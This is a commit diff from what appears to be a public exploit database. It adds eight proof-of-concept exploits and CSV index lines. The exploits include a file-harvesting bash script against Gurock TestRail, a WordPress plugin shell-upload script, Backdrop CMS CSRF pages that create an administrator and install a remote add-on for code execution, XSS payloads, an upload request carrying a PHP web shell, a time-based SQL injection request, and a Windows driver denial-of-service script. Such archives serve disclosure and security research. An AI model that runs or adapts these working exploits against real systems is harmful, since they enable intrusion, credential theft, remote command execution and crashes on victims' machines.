DB: 2021-09-24

8 changes to exploits/shellcodes Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC) Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) Budget and Expense Tracker System 1.0 - Arbitrary File Upload Police Crime Record Management Project 1.0 - Time Based SQLi
2021-09-24 05:02:08 +00:00 · 2021-09-24 05:02:08 +00:00 · c18c22e3d9
commit c18c22e3d9
parent f449a4864b
9 changed files with 547 additions and 0 deletions
--- a/exploits/multiple/webapps/50320.sh
+++ b/exploits/multiple/webapps/50320.sh
@ -0,0 +1,101 @@
+# Exploit Title: Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control
+# Date: 22/09/2022
+# Exploit Author: Sick Codes & JohnJHacking (Sakura Samuraii)
+# Vendor Homepage: https://www.gurock.com/testrail/
+# Version: 7.2.0.3014 and below
+# Tested on: macOS, Linux, Windows
+# CVE : CVE-2021-40875
+# Reference: https://johnjhacking.com/blog/cve-2021-40875/
+
+CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+
+# Method 1
+
+#!/bin/bash
+# Author:       sickcodes & johnjhacking
+# Contact:      https://twitter.com/sickcodes
+# https://github.com/SakuraSamuraii/derailed
+# Copyright:    sickcodes (C) 2021
+# License:      GPLv3+
+
+# stop null byte error while curling
+shopt -s nullglob
+
+! [ "${1}" ] && { echo "No target was specified. ./script.sh 'https://target/'" && exit 1 ; }
+
+TARGET="${1}"
+
+wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt
+
+FILE_LIST="${PWD}/files.md5.txt"
+
+mkdir -p ./output
+cd ./output
+
+touch ./accessible.log
+
+# option to get a fresh updated files.md5, if it comes in a future version
+# curl "${TARGET}/files.md5" > ./files.md5
+
+while read -r HASH SUFFIX; do
+    echo "${SUFFIX}"
+    TESTING_URL="${TARGET}/${SUFFIX}"
+    echo "========= ${TESTING_URL} ========="
+
+    # Ignore list, some of these files MAY be world readable,
+    # if the organisation has modified permissions related
+    # to the below files otherwise, they are ignored.
+    case "${SUFFIX}" in
+        *'.php' ) continue
+            ;;
+        *'.html' ) continue
+            ;;
+        *'LICENSE' ) continue
+            ;;
+        *'README.md' ) continue
+            ;;
+        *'.js' ) continue
+            ;;
+        *'.svg' ) continue
+            ;;
+        *'.gif' ) continue
+            ;;
+        *'.png' ) continue
+            ;;
+        *'.css' ) continue
+            ;;
+        *'.exe' ) continue
+            ;;
+        # *'.add_your_own' ) continue
+        #     ;;
+    esac
+
+    # peek at page response
+    # doesn't work because gurock returns 200 and prints the error in plaintext
+    # curl -s -I -X POST "${TESTING_URL}"
+
+    # feth the page, following redirects, to a variable
+    OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")"
+
+    # find matching disqualifying pharses in the page contents
+    # and pass any pages that are "denied access" or "direct script access"
+    case "${OUTPUT_DATA}" in
+        *'No direct script'* ) continue
+            ;;
+        *'Directory Listing Denied'* ) continue
+            ;;
+    esac
+
+    # save all interesting pages, without forward slashes
+    # https://www.target/
+    # will be saved as:
+    # https:::www.target <http://www.target>:
+    tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}"
+
+    # print to stdout, and also append to ./accessible.log the successful saves
+    tee -a ./accessible.log <<< "${TESTING_URL}"
+
+done < "${FILE_LIST}"
+
+### Results
+in your results folder you will have a few important files from the host, namely the initial SQL database insert statements with specific unique information pertaining to that server running Gurock Testrail 7.2.0.3014 and below
--- a/exploits/php/webapps/50321.py
+++ b/exploits/php/webapps/50321.py
@ -0,0 +1,68 @@
+# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
+# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
+# Date: 22/09/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
+# Version: <= 1.9.1.4
+# Tested on: Ubuntu 20.04.1
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+	print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
+	print("Author -> spacehen (www.github.com/spacehen)")
+
+def print_usage():
+	print("Usage: python3 exploit.py [target url] [php file]")
+	print("Ex: python3 exploit.py https://example.com ./shell.php")
+
+def vuln_check(uri):
+	response = requests.get(uri)
+	raw = response.text
+	if ("jsonrpc" in raw):
+		return True;
+	else:
+		return False;
+
+def main():
+
+	print_banner()
+	if(len(sys.argv) != 3):
+		print_usage();
+		sys.exit(1);
+
+	base = sys.argv[1]
+	file_path = sys.argv[2]
+
+	ajax_action = 'p3dlite_handle_upload'
+	admin = '/wp-admin/admin-ajax.php';
+
+	uri = base + admin + '?action=' + ajax_action ;
+	check = vuln_check(uri);
+
+	if(check == False):
+		print("(*) Target not vulnerable!");
+		sys.exit(1)
+
+	if( path.isfile(file_path) == False):
+		print("(*) Invalid file!")
+		sys.exit(1)
+
+	files = {'file' : open(file_path)}
+	print("Uploading Shell...");
+	response = requests.post(uri, files=files)
+	file_name = path.basename(file_path)
+	if(file_name in response.text):
+		print("Shell Uploaded!")
+		if(base[-1] != '/'):
+			base += '/'
+		print(base + "wp-content/uploads/p3d/" + file_name);
+	else:
+		print("Shell Upload Failed")
+		sys.exit(1)
+
+main();
--- a/exploits/php/webapps/50323.html
+++ b/exploits/php/webapps/50323.html
@ -0,0 +1,232 @@
+# Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
+# Exploit Author: V1n1v131r4
+# Date: 2021-09-22
+# Vendor Homepage: https://backdropcms.org/
+# Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip
+# Version: 1.20.0
+# Tested On: Kali Linux, Ubuntu 20.04
+# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers.
+# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file.
+
+<html>
+<body>
+	<form method="POST" action="http://example.com/backdrop/?q=admin/people/create">
+		<input type="text" name="q" value="admin/people/create">
+		<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
+		<input type="text" name="name" value="hacker">
+		<input type="text" name="mail" value="hacker@hacker.com">
+		<input type="text" name="notify" value="1">
+		<input type="text" name="pass" value="admin">
+		<input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY">
+		<input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I">
+		<input type="text" name="form_id" value="user_register_form">
+		<input type="text" name="status" value="1">
+		<input type="text" name="roles[administrator]" value="administrator">
+		<input type="text" name="op" value="Create new account">
+		<input type="submit" value="Send">
+	</form>
+</body>
+</html>
+
+# Step 1
+# Send this page below to the victim
+
+<html>
+<body>
+        <form method="POST" action="http://example.com/backdrop/?q=system/ajax">
+                <input type="text" name="q" value="system/ajax">
+                <input type="text" name="Backdrop.tableDrag.showWeight" value="0">
+                <input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
+                <input type="text" name="bulk" value="">
+                <input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar">
+                <input type="text" name="files[project_upload]" value="">
+                <input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA">
+                <input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw">
+                <input type="text" name="form_id" value="installer_manager_install_form">
+                <input type="text" name="_triggering_element_name" value="op">
+                <input type="text" name="_triggering_element_value" value="Install">
+                <input type="text" name="ajax_html_ids[]" value="skip-link">
+                <input type="text" name="ajax_html_ids[]" value="main-content">
+                <input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form">
+                <input type="text" name="ajax_html_ids[]" value="edit-search-text">
+                <input type="text" name="ajax_html_ids[]" value="edit-submit">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-ajax">
+                <input type="text" name="ajax_html_ids[]" value="title-link">
+                <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib">
+                <input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link">
+                <input type="text" name="ajax_html_ids[]" value="edit-link">
+                <input type="text" name="ajax_html_ids[]" value="admin-bar">
+                <input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper">
+                <input type="text" name="ajax_html_ids[]" value="admin-bar-icon">
+                <input type="text" name="ajax_html_ids[]" value="admin-bar-menu">
+                <input type="text" name="ajax_html_ids[]" value="admin-bar-extra">
+                <input type="text" name="ajax_html_ids[]" value="admin-bar-search-items">
+                <input type="text" name="ajax_html_ids[]" value="ui-id-1">
+                <input type="text" name="ajax_html_ids[]" value="backdrop-modal">
+                <input type="text" name="ajax_html_ids[]" value="installer-manager-install-form">
+                <input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper">
+                <input type="text" name="ajax_html_ids[]" value="edit-bulk">
+                <input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper">
+                <input type="text" name="ajax_html_ids[]" value="edit-project-url">
+                <input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper">
+                <input type="text" name="ajax_html_ids[]" value="edit-project-upload">
+                <input type="text" name="ajax_html_ids[]" value="edit-actions">
+                <input type="text" name="ajax_html_ids[]" value="edit-submit--2">
+                <input type="text" name="ajax_page_state[theme]" value="seven">
+                <input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo">
+                <input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1">
+                <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1">
+                <input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1">
+                <input type="submit" value="Send">
+        </form>
+</body>
+</html>
+
+Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.
--- a/exploits/php/webapps/50324.txt
+++ b/exploits/php/webapps/50324.txt
@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
+# Date: 15/2/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
+# Version: 3.1.7
+# Tested on: Windows 10
+# CVE: CVE-2021-24169
+
+1. Description:
+This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
+
+2. Proof of Concept:
+wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
--- a/exploits/php/webapps/50325.html
+++ b/exploits/php/webapps/50325.html
@ -0,0 +1,18 @@
+# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
+# Date: 2/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/fitness-calculators/
+# Version: 1.9.5
+# Tested on: Windows 10
+# CVE: CVE-2021-24272
+
+1. Description:
+The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers.
+Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
+
+2. Proof of Concept:
+
+<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
+    <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
+    <input type="submit" value="Save" name="submit">
+</form>
--- a/exploits/php/webapps/50326.txt
+++ b/exploits/php/webapps/50326.txt
@ -0,0 +1,52 @@
+# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
+# Exploit Author: ()t/\/\1
+# Date: 23/09/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
+# Tested on: Linux
+# Version: 2.0
+
+# Exploit Description:
+The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
+
+
+# PoC request
+
+POST /expense_budget/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/expense_budget/admin/?page=user
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
+Content-Length: 824
+Connection: close
+Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
+
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="firstname"
+
+A
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="lastname"
+
+a
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="img"; filename="na3na3.php"
+Content-Type: image/jpeg
+
+<?php echo "<pre>";system($_GET['cmd']); ?>
+-----------------------------1399170066243244238234165712--
--- a/exploits/php/webapps/50327.txt
+++ b/exploits/php/webapps/50327.txt
@ -0,0 +1,23 @@
+# Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi
+# Exploit Author: ()t/\/\1
+# Date: 23/09/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
+# Tested on: Linux
+# Version: 1.0
+
+# Exploit Description:
+The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
+
+The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
+
+# PoC request
+
+GET /ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
+Upgrade-Insecure-Requests: 1
--- a/exploits/windows/dos/50322.py
+++ b/exploits/windows/dos/50322.py
@ -0,0 +1,32 @@
+# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)
+# Date: 27/08/2021
+# Exploit Author: Quadron Research Lab
+# Version: all version
+# Tested on: Windows 10 x64 HUN/ENG Professional
+# Vendor: https://www.redragonzone.com/pages/download
+# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE
+
+
+import ctypes, sys
+from ctypes import *
+import io
+from itertools import product
+from sys import argv
+
+devicename = "REDRAGON_MOUSE"
+
+ioctl = 0x222414
+
+kernel32 = windll.kernel32
+hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None)
+
+if not hevDevice or hevDevice == -1:
+    print ("Not Win! Sorry!")
+
+else:
+    print ("OPENED!")
+
+    buf = '\x44' * 1000 + '\x00' * 1000
+    bufLength = 2000
+
+    kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6800,6 +6800,7 @@ id,file,description,date,author,type,platform,port
 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
 50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows,
 50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service",1970-01-01,"Eric Salario",dos,windows,
+50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -44436,3 +44437,10 @@ id,file,description,date,author,type,platform,port
 50317,exploits/multiple/webapps/50317.txt,"Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)",1970-01-01,"Akıner Kısa",webapps,multiple,
 50318,exploits/python/webapps/50318.py,"Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mohin Paramasivam",webapps,python,
 50319,exploits/php/webapps/50319.py,"Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
+50320,exploits/multiple/webapps/50320.sh,"Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control",1970-01-01,"Sick Codes",webapps,multiple,
+50321,exploits/php/webapps/50321.py,"Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
